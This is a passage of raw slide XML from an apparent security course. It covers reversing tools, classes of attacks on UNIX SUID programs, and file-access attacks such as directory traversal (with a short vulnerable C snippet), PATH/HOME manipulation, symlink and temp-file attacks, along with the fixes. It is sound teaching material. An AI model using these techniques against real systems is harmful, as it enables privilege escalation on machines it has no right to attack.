            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Radare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a program analysis tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.radare.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/r/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports reversing and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disassembling of binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forensic analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports collaborative analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ree</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93700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IDA Pro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IDA Pro is the state-of-the-art tool for reversing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hex-rays.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It supports disassembling of binary programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Hex-Rays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be integrated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and other debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is a commercial product (expensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A limited version is available for free</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75866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Hopper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disassembler that supports sophisticated analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hopperapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Includes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is a commercial product but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It can be used for free (with limitations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is not very expensive (~90$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121931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UNIX Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote attacks against a network service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote attacks against the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remote attacks against a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local attacks against SUID applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Local attacks against the operating system </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="132471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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UNIX Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>99% of the local vulnerabilities in UNIX systems exploit SUID-root programs to obtain root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1% of the attacks target the operating system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>kernel itself</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking SUID applications is based on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>line, environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During execution: dynamic-linked objects, file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>input, socket input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interaction with the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system: creation of files, access to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes: signals, invocation of other commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes defining the boundaries of an application is not easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145580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4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4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4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4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4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4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40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40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40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Classes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File access attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Path attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>TOCTTOU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File handler reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack corruption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Heap corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format string exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11833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Access Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access to files in the file system is performed by using path strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an attacker has a way to control how or when a privileged application builds a path string, it can lure the application into violating the security policy of the system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="208478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Vulnerabilities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These vulnerabilities are flaws in the overall logic of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lack of authentication and/or authorization checks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erroneous trust assumptions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>These vulnerabilities are the most difficult to identify automatically because they require a clear understanding of the functionality implemented by the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Confused Deputy problem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7781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Dot-Dot Attack</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 application builds a path by concatenating a path prefix with values provided by the user (the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/&lt;initial path&gt;/", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>user_file</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free_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file = open(path, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The user (attacker) provides a filename containing a number of “..” that allow for escaping from the directory and access any file in the file system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also called: directory traversal attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="58578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Input provided by the user should be heavily sanitized before being used in creating a path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>chroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() can be used to confine an application to a subset of the file system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="128518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and HOME Attacks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PATH environment variable determines how the shell searches for commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an application invokes commands without specifying the complete path, it is possible to induce an application to execute a different version (controlled by the attacker) of the external command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() use the shell PATH variable to locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The HOME environment variable determines how the home directory path is expanded by the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If an application uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>using a home-relative path  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., ~</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myfile.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>), an attacker can modify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>his/her $HOME variable to control the execution of commands (or the access to files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7854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Absolute paths should always be used when executing external commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Home-relative paths should never be used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78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Attacks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Some applications check the path to a file (e.g., to verify that the file is under a certain directory) but not the nature of the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By creating symbolic links an attacker can force an application to access files outside the intended path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When an application creates a temporary file it might not check for its properties in the assumption that the file has been created with the correct privileges </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32365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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523269" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> utility </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>shipped with the Common Desktop Environment (CDE)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dtappgather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses a directory with permissions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0555</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to create temporary files used by each login session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>dt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>appconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
